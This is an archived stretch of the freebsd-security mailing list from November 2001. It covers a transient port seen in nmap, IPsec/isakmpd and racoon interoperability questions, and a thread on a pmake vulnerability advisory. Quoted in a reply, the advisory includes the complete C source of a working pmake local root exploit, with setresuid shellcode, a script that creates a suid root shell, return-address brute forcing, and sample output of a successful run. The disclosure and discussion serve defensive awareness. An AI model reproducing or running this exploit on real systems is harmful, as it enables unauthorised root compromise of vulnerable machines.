work. You must have something else wonky going on. Kris --Q68bSM7Ycu6FN28Q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7/B6MWry0BWjoQKURAn6oAKDijRH2MrtKGa/EtxzFtX6t0RL1UgCeMLSO S1xeemuryPRWSqAKe6R8a9g= =x4zO -----END PGP SIGNATURE----- --Q68bSM7Ycu6FN28Q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 20:11:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.ihug.co.nz (smtp1.ihug.co.nz [203.109.252.7]) by hub.freebsd.org (Postfix) with ESMTP id 7C5F937B417 for ; Wed, 21 Nov 2001 20:11:06 -0800 (PST) Received: from geoff (p27-max1.wlg.ihug.co.nz [203.173.230.27]) by smtp1.ihug.co.nz (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id RAA24081 for ; Thu, 22 Nov 2001 17:10:57 +1300 X-Authentication-Warning: smtp1.ihug.co.nz: Host p27-max1.wlg.ihug.co.nz [203.173.230.27] claimed to be geoff Message-ID: <020801c1730b$8cd21fe0$41414fcb@lawn> From: "Geoff Lawn" To: Subject: Unknown transient service 1528/tcp Date: Thu, 22 Nov 2001 17:08:34 +1300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi there, I regularly do an nmap on our server with the following results... Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 110/tcp open pop-3 443/tcp open https Recently I noticed the following service appear... 1528/tcp open mciautoreg I did another nmap a minute later and the service was no longer there. Does anyone know what this might be? Have I been hacked?? Thanks, Geoff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 20:14:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe66.pav1.hotmail.com [64.4.30.201]) by hub.freebsd.org (Postfix) with ESMTP id E17FE37B416 for ; Wed, 21 Nov 2001 20:14:41 -0800 (PST) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 21 Nov 2001 20:14:41 -0800 X-Originating-IP: [24.114.220.235] From: "jack xiao" To: Subject: isakmpd questions Date: Wed, 21 Nov 2001 23:16:06 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_017E_01C172E2.7F020A20" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Message-ID: X-OriginalArrivalTime: 22 Nov 2001 04:14:41.0816 (UTC) FILETIME=[358A9180:01C1730C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_017E_01C172E2.7F020A20 Content-Type: text/plain; charset="gb2312" Content-Transfer-Encoding: base64 SGksDQoNCkkgd29uZGVyIHdoeSBJIGNhbid0IHVzZSBERVMgZm9yIGVuY3lycHRpb24gaW4gcGhh c2UgMSB3aGVuIEkgdXNlIElzYWttcGQgdG8gc2V0IHVwIGlwc2VjIHR1bm5lbC4gSSBrbm93IHRo aXMgcG9ydHMgaW4gRnJlZUJTRCB3YXMgcG9ydGVkIGZyb20gT3BlbkJTRCwgYnV0IEkgY2FuIHVz ZSBERVMgaW4gcGhhc2UgMSB1bmRlciBPcGVuQlNELiBJcyB0aGVyZSBhbnkgZGlmZmVyZW5jZSBh Ym91dCBpcHNlYyBpbiB0aGUga2VybmVsIGJldHdlZW4gdGhlc2UgdHdvPyBBbnkgaWRlYXMgd2ls bCBidyBhcHByZWNpYXRlZC4NCg0KVGhhbmtzIGEgbG90IQ0KDQpKYWNrIA0K ------=_NextPart_000_017E_01C172E2.7F020A20 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: base64 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMCBUcmFuc2l0aW9uYWwv L0VOIj4NCjxIVE1MPjxIRUFEPg0KPE1FVEEgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWdi MjMxMiIgaHR0cC1lcXVpdj1Db250ZW50LVR5cGU+DQo8TUVUQSBjb250ZW50PSJNU0hUTUwgNS4w MC4yNjE0LjM1MDAiIG5hbWU9R0VORVJBVE9SPg0KPFNUWUxFPjwvU1RZTEU+DQo8L0hFQUQ+DQo8 Qk9EWSBiZ0NvbG9yPSNmZmZmZmY+DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6ZT0yPkhpLDwv Rk9OVD48L0RJVj4NCjxESVY+Jm5ic3A7PC9ESVY+DQo8RElWPjxGT05UIGZhY2U9QXJpYWwgc2l6 ZT0yPkkgd29uZGVyIHdoeSBJIGNhbid0IHVzZSBERVMgZm9yIGVuY3lycHRpb24gaW4gDQpwaGFz ZSAxIHdoZW4gSSB1c2UgSXNha21wZCB0byBzZXQgdXAgaXBzZWMgdHVubmVsLiBJIGtub3cgdGhp cyBwb3J0cyBpbiBGcmVlQlNEIA0Kd2FzIHBvcnRlZCBmcm9tIE9wZW5CU0QsIGJ1dCBJIGNhbiB1 c2UgREVTIGluIHBoYXNlIDEgdW5kZXIgT3BlbkJTRC4gSXMgdGhlcmUgDQphbnkgZGlmZmVyZW5j ZSBhYm91dCBpcHNlYyBpbiB0aGUga2VybmVsIGJldHdlZW4gdGhlc2UgdHdvPyBBbnkgaWRlYXMg d2lsbCBidyANCmFwcHJlY2lhdGVkLjwvRk9OVD48L0RJVj4NCjxESVY+PEZPTlQgZmFjZT1Bcmlh bCBzaXplPTI+PC9GT05UPiZuYnNwOzwvRElWPg0KPERJVj48Rk9OVCBmYWNlPUFyaWFsIHNpemU9 Mj5UaGFua3MgYSBsb3QhPC9GT05UPjwvRElWPg0KPERJVj4mbmJzcDs8L0RJVj4NCjxESVY+PEZP TlQgZmFjZT1BcmlhbCBzaXplPTI+SmFjazwvRk9OVD4mbmJzcDs8L0RJVj48L0JPRFk+PC9IVE1M Pg0K ------=_NextPart_000_017E_01C172E2.7F020A20-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 20:20:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 6329037B405 for ; Wed, 21 Nov 2001 20:20:12 -0800 (PST) Received: (qmail 3327 invoked by uid 1000); 22 Nov 2001 04:20:11 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Nov 2001 04:20:11 -0000 Date: Wed, 21 Nov 2001 22:20:11 -0600 (CST) From: Mike Silbersack To: Subject: Re: Advisory: Berkeley pmake In-Reply-To: <3BFBC625.371BC65C@starzetz.de> Message-ID: <20011121221635.C2710-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FWIW, I decided to look at our (pmake-derived) make. It appears that this bug was fixed in changes made by NetBSD folk which we imported over 5 years ago. That's cool. :) In any case, since we don't have make setuid, it looks like it was never an issue for us. Mike "Silby" Silbersack On Wed, 21 Nov 2001, Paul Starzetz wrote: > 1. Problem description > ---------------------- > > There is a format string bug in the Berkeley's pmake 2.1.33 and below > (parallel make) package as well as a buffer overflow problem. Pmake is > suid root on various Linux distributions and uses root privileges for > binding to low TCP ports. The ordinary format string bug leads to local > root compromise on all vulnerable machines. > > > 2. Details > ---------- > > The vulnerable code can be found in src/job.c at line 720 and looks > like: > > if (! (job->flags & JOB_SILENT) && !shutUp && > commandShell->hasEchoCtl) { > DBPRINTF ("%s\n", commandShell->echoOff); > DBPRINTF (commandShell->errCheck, cmd); > shutUp = TRUE; > } > > and in src/str.c line 170: > > register char *tstr; /* Pointer into tstring */ > char tstring[512]; /* Temporary storage for the > * current word */ > > > So if the user puts a shell definition into the Makefile, pmake will use > errCheck for output formatting which is controllable by the user. The > following Makefile demonstrates the format string problem: > > all: > -echo blah > > .SHELL : path=/bin/sh echo="" quiet="" hasErrCtl=no check=%x%x%x%x%x > > Putting a long line (>512 characters) in place of the '%x' results in > SIGSEGV and possible overwrite of the return address on the stack (a > very carefully prepared string is needed). > > > 3. Solution > ----------- > > The patch for the format string bug is obvious. Temporary solution is to > remove the suid bit from the binary. > > > 4. Status > --------- > > Vendors informed in July 2001. > > > 5. Exploit > ---------- > > A hole is a hole is a ... only if it is exploitable. The attached C > source code will brute force the format string and create a suid shell. > There is nothing special about it - the only hard point is to get the > write length correctly. Succesfull exploitation looks like: > > > paul@phoenix:~/expl/pmake > ./pm -w+2 > > ***************************************** > * * > * pmake local root exploit * > * by IhaQueR@IRCnet '2001 * > * * > ***************************************** > > > > * PHASE 1 > > preparing new environment > cleaning > preparing shell script > allocating pipe > stdout/in preparation > generating Makefile > finished setup > > > * PHASE 2 > > digging magic string: 0 1 2 3 4 5 6 7 > 8 9 10 11 12 > found mark, parsing output > FOUND magic string with pading=0 output length=1446 > > > * PHASE 3 > > looking for write position: 1 * FOUND * > FOUND write position at index=1 > creating final makefile > creating shell in the environment > > > * PHASE 4 > > brute force RET: 0xbfff73b0 0xbfff73b4 0xbfff73b8 > 0xbfff73bc 0xbfff73c0 > > Paradox, created suid shell at /home/paul/expl/pmake/sush > > > ----------------------------------- pmexpl.c > ----------------------------------- > > /**************************************************************** > * * > * Pmake <= 2.1.33 local root exploit * > * coded by IhaQueR@IRCnet * > * compile with gcc -pmexpl-c -o pm * > * meet me at HAL '2001 * > * * > ****************************************************************/ > > > > > > #include > #include > #include > #include > #include > #include > #include > #include > > > > // some definitions > #define TARGET "/usr/bin/pmake" > #define MKFILE "Makefile" > #define MKMSH "./mkmsh" > #define TMPLEN 256 > #define USERSTACK 0xc0000000u > #define NN "\E[m" > #define GR "\E[32m" > #define RD "\E[31m" > #define BL "\E[34m" > #define BD "\E[1m" > #define FL "\E[5m" > #define UL "\E[4m" > > > extern char **environ; > > static const char *banner = "\n" > BL"*****************************************\n" > "*\t\t\t\t\t*\n" > "*\tpmake local root exploit\t*\n" > "*\tby "FL"IhaQueR@IRCnet"NN BL" '2001\t\t*\n" > "*\t\t\t\t\t*\n" > "*****************************************\n" > "\n"NN; > > static const char *usage = "\n" > UL"USAGE:"NN " %s\t-w \n" > "\t\t-s \n" > "\t\t-a 2.1.33>\n" > "\t\t-m \n" > "\t\t-p <%%g preload>\n" > "\n"; > > static const char *mkfile = "all:\n\t-echo blah\n\n.SHELL : path=/bin/sh > echo=\"\" quiet=\"\" hasErrCtl=no check="; > > // setresuid(0,0,0) shellcode > static char hellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x31\xd2" > "\xb0\xa4\xcd\x80" > "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" > "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" > "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./mkmsh"; > > // our suid shell maker > static char mkmsh[] = "#!/bin/bash\n" > "cat <<__DUPA__>sush.c\n" > "#include \n" > "#include \n" > "main() {setuid(geteuid()); execl(\"/bin/bash\", \"/bin/bash\", > NULL);}\n" > "__DUPA__\n" > "gcc sush.c -o sush >/dev/null 2>&1\n" > "chown 0.0 sush\n" > "chmod u+s sush\n"; > > static char *fromenv[] = { "TERM", > "HOME", > "PATH" > }; > > #define numenv (sizeof(fromenv)/sizeof(char*)+2) > > static char *myenv[numenv]; > static char eb[numenv][TMPLEN]; > > int cn=0; > > > void child_kill(int v) > { > cn--; > } > > > int do_fork() > { > cn++; > return fork(); > } > > > int main(int ac, char** av) > { > int pd[2], fd, mk, i, j, res, pid, cnt, flip, mx, wdel; > unsigned *up, pad, wlen, shadr, wadr, len1, old, idx, gprel; > unsigned char *ptr; > char buf[16384]; > char buf2[16384]; > char aaaa[1024*32]; > char head[64]; > struct stat sb; > fd_set rs; > > > // setup defaults > // shell address is calculated from user stack location and the big nop > buffer...should work :-/ > shadr = USERSTACK - sizeof(aaaa)/2; > wadr = 0xbfff73b0; > mx = 512; > gprel=150; > wdel=0; > > setpgrp(); > setsid(); > > printf(banner); > > // parse options > if(ac!=1) { > res = getopt(ac, av, "hw:s:a:m:p:"); > while(res!=-1) { > switch(res) { > case 'w' : > wdel = atoi(optarg); > break; > > case 's' : > sscanf(optarg, "%x", &shadr); > break; > > case 'a' : > sscanf(optarg, "%x", &wadr); > break; > > case 'm' : > sscanf(optarg, "%d", &mx); > break; > > case 'p' : > sscanf(optarg, "%d", &gprel); > if(gprel==0) > gprel=1; > break; > > case 'h' : > default : > printf(usage, av[0]); > exit(0); > break; > } > res = getopt(ac, av, "hw:s:a:m:p:"); > } > } > > > // phase 1 : setup > printf("\n\n"BD BL"* PHASE 1\n"NN); > > // prepare environ > printf("\n\tpreparing new environment"); > memset(aaaa, 'A', sizeof(aaaa)); > aaaa[4]='='; > up=(unsigned*)(aaaa+5); > for(i=0; i up[i]=0x41424344; > aaaa[sizeof(aaaa)-1]=0; > len1=strlen(aaaa); > > // buffer overflow :-) > myenv[0]=aaaa; > for(i=1; i myenv[i]=eb[i-1]; > strcpy(eb[i-1], fromenv[i-1]); > if(!strchr(fromenv[i-1], '=')) { > strcat(eb[i-1], "="); > strcat(eb[i-1], getenv(fromenv[i-1])); > } > } > myenv[numenv-1]=NULL; > > // clean > printf("\n\tcleaning"); > unlink("LOCK.make"); > unlink("sush"); > unlink("sush.c"); > unlink("mkmsh"); > system("rm -rf /tmp/make* >/dev/null 2>&1"); > > // our suid shell > printf("\n\tpreparing shell script"); > mk = open(MKMSH, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU|S_IXGRP|S_IXOTH); > if(mk<0) > perror("open"), exit(1); > write(mk, mkmsh, strlen(mkmsh)); > close(mk); > > // comm pipe > printf("\n\tallocating pipe"); > res = pipe(pd); > if(res<0) > perror("pipe"), exit(2); > > // redirect stdin/out > printf("\n\tstdout/in preparation"); > res = dup2(pd[1], 2); > if(res<0) > perror("dup2"), exit(3); > > fd = open("/dev/null", O_RDWR); > if(fd<0) > perror("open"), exit(4); > > // our makefile > printf("\n\tgenerating Makefile"); > mk = open(MKFILE, O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU); > if(mk<0) > perror("open"), exit(5); > write(mk, mkfile, strlen(mkfile)); > for(i=0; i write(mk, "%g", 2); > fsync(mk); > > // child killer > printf("\n\tfinished setup"); > if(signal(SIGCHLD, &child_kill)==SIG_ERR) > perror("signal"), exit(6); > > > // phase 2 : dig format string > printf("\n\n\n" BD BL "* PHASE 2\n"NN); > printf("\n\tdigging magic string:\t"); > > cnt=0; > while(1) { > > lseek(mk, -2, SEEK_CUR); > write(mk, "%g%x", 4); > fsync(mk); > usleep(1); > > pid = do_fork(); > > // get child output > if(pid) { > printf("%4d ", cnt); > fflush(stdout); > > do { > bzero(buf, sizeof(buf)); > res = read(pd[0], buf, sizeof(buf)-1); > if(res > 128) { > break; > } > } while(1); > kill(SIGTERM, pid); > usleep(1); > waitpid(pid, NULL, WUNTRACED); > bzero(buf2, sizeof(buf2)); > read(pd[0], buf2, sizeof(buf2)-1); > if(waitpid(pid, NULL, WUNTRACED|WNOHANG)>0) > read(pd[0], buf2, sizeof(buf2)-1); > > // look for padding > pad=-1; > if(strstr(buf, "41424344")) { > pad=0; > } > else if(strstr(buf, "42434441")) { > pad=1; > } > else if(strstr(buf, "43444142")) { > pad=2; > } > else if(strstr(buf, "44414243")) { > pad=3; > } > > // if got the mark parse output for final string > if(pad!=-1) { > printf("\n\tfound mark, parsing output"); > ptr = strtok(buf, "\t\n "); > while(ptr) { > if(strlen(ptr)>64) > break; > ptr = strtok(NULL, "\t\n "); > } > > // calculate write length -6, -8 hm I'm dunno about the 16? > wlen=strlen(ptr)+wdel-16; > printf("\n\tFOUND magic string with pading=%d output length=%d", > pad, wlen); > > > // PHASE 3 : find write pos in aaaa > printf("\n\n\n" BD BL "* PHASE 3\n"NN); > > printf("\n\tlooking for write position: "); > > up=(unsigned*)(aaaa+5-pad); > cnt=0; > > for(i=1; i old=up[i]; > up[i]=0xabcdef67; > printf("%4d ", i); > sprintf(head, "%x", up[i]); > fflush(stdout); > > if(cn) > read(pd[0], buf2, sizeof(buf2)-1); > pid = do_fork(); > if(pid) { > do { > bzero(buf, sizeof(buf)); > FD_ZERO(&rs); > FD_SET(pd[0], &rs); > select(pd[0]+1, &rs, NULL, NULL, NULL); > res = read(pd[0], buf, sizeof(buf)-1); > if(res > 128) { > break; > } > } while(1); > kill(SIGTERM, pid); > usleep(1); > read(pd[0], buf2, sizeof(buf2)-1); > > // up[i] is now the place for the beginning of our address field > if(strstr(buf, head)) { > printf(" * FOUND *"); > fflush(stdout); > up[i]=old; > idx=i; > printf("\n\tFOUND write position at index=%d", i); > up[i]=old; > ptr = strtok(buf, "\t\n "); > while(ptr) { > if(strlen(ptr)>64) > break; > ptr = strtok(NULL, "\t\n "); > } > > // construct write 'head': > printf("\n\tcreating final makefile"); > fflush(stdout); > lseek(mk, -2, SEEK_CUR); > > ptr = (unsigned char*)&shadr; > for(j=0; j<4; j++) { > flip = (((int)256) + ((int)ptr[j])) - ((int)(wlen % 256u)); > wlen = wlen + flip; > sprintf(head+j*8, "%%%04dx%%n", flip); > } > head[32] = 0; > write(mk, head, strlen(head)); > > // brute force RET on the stack upon success > printf("\n\tcreating shell in the environment"); > > // create env shell > ptr = (unsigned char*)&(up[i+2*10]); > while(ptr<(unsigned char*)(aaaa+sizeof(aaaa)-4)) { > *ptr=0x90; > ptr++; > } > > strncpy(aaaa+sizeof(aaaa)-strlen(hellcode)-1, hellcode, > strlen(hellcode)); > aaaa[sizeof(aaaa)-1]=0; > if(len1!=strlen(aaaa)) { > printf(BD RD"\nERROR: len changed!\n"NN); > exit(7); > } > > // phase 4: brute force > printf("\n\n\n"BD BL"* PHASE 4\n"NN); > printf("\n\tbrute force RET:\t"); > fflush(stdout); > cnt=0; > > while(cnt > for(j=0; j<4; j++) { > up[idx+2*j] = wadr + j%4; > up[idx+2*j+1] = wadr + j%4; > } > > pid = do_fork(); > if(pid) { > printf(" 0x%.8x", wadr); > fflush(stdout); > waitpid(pid, NULL, WUNTRACED); > res = stat("sush", &sb); > if(!res && sb.st_uid==0) { > printf(BD GR"\n\nParadox, created suid shell at > %s/sush\n\n"NN, getcwd(buf, sizeof(buf)-1)); > system("rm -rf /tmp/make* >/dev/null 2>&1"); > exit(0); > } > } > else { > res = dup2(fd, 1); > if(res<0) > perror("dup2"), exit(8); > res = dup2(fd, 2); > if(res<0) > perror("dup2"), exit(9); > > execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); > _exit(10); > } > if(cnt%8==7) > printf("\n\t\t\t\t"); > cnt++; > wadr += 4; > } > // failure > printf(BD RD"\nFAILED :-("NN); > system("rm -rf /tmp/make* >/dev/null 2>&1"); > exit(11); > } > } > else { > res = dup2(fd, 1); > if(res<0) > perror("dup2"), exit(12); > execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); > exit(13); > } > up[i]=old; > waitpid(pid, NULL, WUNTRACED); > } > > printf(BD RD"\n\tstrange error, write pos not found!\n"NN); > system("rm -rf /tmp/make* >/dev/null 2>&1"); > exit(14); > > ptr = strtok(buf, "\n"); > while(ptr) { > printf("\nLINE [%s]", ptr); > ptr = strtok(NULL, "\n"); > } > > exit(15); > } > > // start target and read output > } > else { > res = dup2(fd, 1); > if(res<0) > perror("dup2"), exit(16); > execle(TARGET, TARGET, "-X", "-dj", NULL, myenv); > exit(17); > } > > if(cnt%8==7) > printf("\n\t\t\t\t"); > cnt++; > } > > printf(BD RD"\nFAILED\n"NN); > system("rm -rf /tmp/make* >/dev/null 2>&1"); > > return 0; > } > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 20:26:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 99A4C37B418 for ; Wed, 21 Nov 2001 20:26:27 -0800 (PST) Received: (qmail 3365 invoked by uid 1000); 22 Nov 2001 04:26:26 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Nov 2001 04:26:26 -0000 Date: Wed, 21 Nov 2001 22:26:26 -0600 (CST) From: Mike Silbersack To: Subject: Re: Advisory: Berkeley pmake In-Reply-To: <20011121221635.C2710-100000@achilles.silby.com> Message-ID: <20011121222522.H2710-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Er, I should clarify my comments on pmake. I examined make in the base system... I have no idea if we have pmake in ports and/or if it is affected. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 20:27:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id ECA9937B417 for ; Wed, 21 Nov 2001 20:27:43 -0800 (PST) Received: (qmail 3375 invoked by uid 1000); 22 Nov 2001 04:27:43 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Nov 2001 04:27:43 -0000 Date: Wed, 21 Nov 2001 22:27:43 -0600 (CST) From: Mike Silbersack To: Geoff Lawn Cc: Subject: Re: Unknown transient service 1528/tcp In-Reply-To: <020801c1730b$8cd21fe0$41414fcb@lawn> Message-ID: <20011121222647.O2710-100000@achilles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 22 Nov 2001, Geoff Lawn wrote: > Hi there, > > I regularly do an nmap on our server with the following results... > > Port State Service > 21/tcp open ftp > 22/tcp open ssh > 25/tcp open smtp > 110/tcp open pop-3 > 443/tcp open https > > Recently I noticed the following service appear... > 1528/tcp open mciautoreg > > I did another nmap a minute later and the service was no longer there. > > Does anyone know what this might be? > Have I been hacked?? > > Thanks, > Geoff Were you nmapping the machine nmap was running on? You sometimes catch the port nmap is running the scan from when doing it that way, if I recall correctly. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 21:20:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from oksala.org (modemcable005.86-201-24.timi.mc.videotron.ca [24.201.86.5]) by hub.freebsd.org (Postfix) with ESMTP id 082FE37B417 for ; Wed, 21 Nov 2001 21:20:47 -0800 (PST) Received: from videotron.ca (silence [24.201.86.5]) by oksala.org (8.11.6/8.11.1) with ESMTP id fAM5JF571917 for ; Thu, 22 Nov 2001 00:19:16 -0500 (EST) (envelope-from oksala@videotron.ca) Message-ID: <3BFC8AD3.8DC9E56D@videotron.ca> Date: Thu, 22 Nov 2001 00:19:15 -0500 From: Pierre-Luc =?iso-8859-1?Q?Lesp=E9rance?= X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 Cc: security@freebsd.org Subject: Re: Unknown transient service 1528/tcp References: <020801c1730b$8cd21fe0$41414fcb@lawn> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Geoff Lawn wrote: > > Hi there, > > I regularly do an nmap on our server with the following results... > > Port State Service > 21/tcp open ftp > 22/tcp open ssh > 25/tcp open smtp > 110/tcp open pop-3 > 443/tcp open https > > Recently I noticed the following service appear... > 1528/tcp open mciautoreg > The best way to figure out what's listening on your computer may be netstat and sockstat. Because nmap by default *does not test All ports. for example netstat -an | grep LISTEN sockstat is very usefull too. take a look . To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 21:34:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.axelero.hu (cmail.axelero.hu [195.228.240.83]) by hub.freebsd.org (Postfix) with SMTP id 2A32B37B418 for ; Wed, 21 Nov 2001 21:34:26 -0800 (PST) Received: (qmail 20417 invoked from network); 22 Nov 2001 06:34:23 +0100 Received: from adsl223.224.axelero.hu (HELO Vasarely.Zahemszky.HU) (195.228.224.223) by mail.axelero.hu with SMTP; 22 Nov 2001 06:34:24 +0100 Received: (from uucp@localhost) by Vasarely.Zahemszky.HU (8.10.1/8.10.1) id fAM4aOw27874 for ; Thu, 22 Nov 2001 05:36:24 +0100 (CET) Date: Thu, 22 Nov 2001 05:35:55 +0100 From: =?iso-8859-1?Q?Zahemszky_G=E1bor?= To: freebsd-security@freebsd.org Subject: Re: Advisory: Berkeley pmake Message-ID: <20011122053555.A3134@Picasso.Zahemszky.HU> References: <20011121221635.C2710-100000@achilles.silby.com> <20011121222522.H2710-100000@achilles.silby.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011121222522.H2710-100000@achilles.silby.com>; from silby@silby.com on Wed, Nov 21, 2001 at 10:26:26PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Nov 21, 2001 at 10:26:26PM -0600, Mike Silbersack wrote: > > Er, I should clarify my comments on pmake. I examined make in the base > system... I have no idea if we have pmake in ports and/or if it is > affected. Yes, we have pmake in ports/devel/pmake, and it's version 2.1.33 (on FBSD 4.4R) By the way, I didn't check the vulnerability. Bye, ZGabor < Gabor at Zahemszky dot HU > -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 21 22:36:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 7BBE737B416 for ; Wed, 21 Nov 2001 22:36:07 -0800 (PST) Received: from localhost ([3ffe:501:41c:2000:342f:cf8d:c16e:87e5]) by mine.kame.net (8.11.1/3.7W) with ESMTP id fAM6UT605265; Thu, 22 Nov 2001 15:30:29 +0900 (JST) To: freebsd-security-local@insignia.com Cc: freebsd-security@freebsd.org Subject: Re: KAME IPSec <->Redcreek In-Reply-To: Your message of "Wed, 21 Nov 2001 10:21:04 +0000" References: X-Mailer: Cue version 0.6 (011026-1440/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20011122153613U.sakane@kame.net> Date: Thu, 22 Nov 2001 15:36:13 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 16 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I wonder anyone has had success talking to a RedCreek Ravlin > VPN gateway. I have some colleagues who are successfully using > freeswan, but I'm having none at all with racoon. > > A packet trace shows the initial packet going to port 500 of > the Ravlin, but no response. Unfortunately the Ravlin doesn't > syslog anything at all in this situation, so it's kind of > hard to debug! did you compare between the ravlin's configuration and racoon's one ? if there was a mismatch, the negotiation would fail. during the phase1 negotiation, sometime the node would discard siliently. there is a possibility that the ravlin requires the main mode of IKE. but according to your explanation, the packet might not reach the port 500 of the ravlin because there might be a packet filtering. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 22 0:47:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org 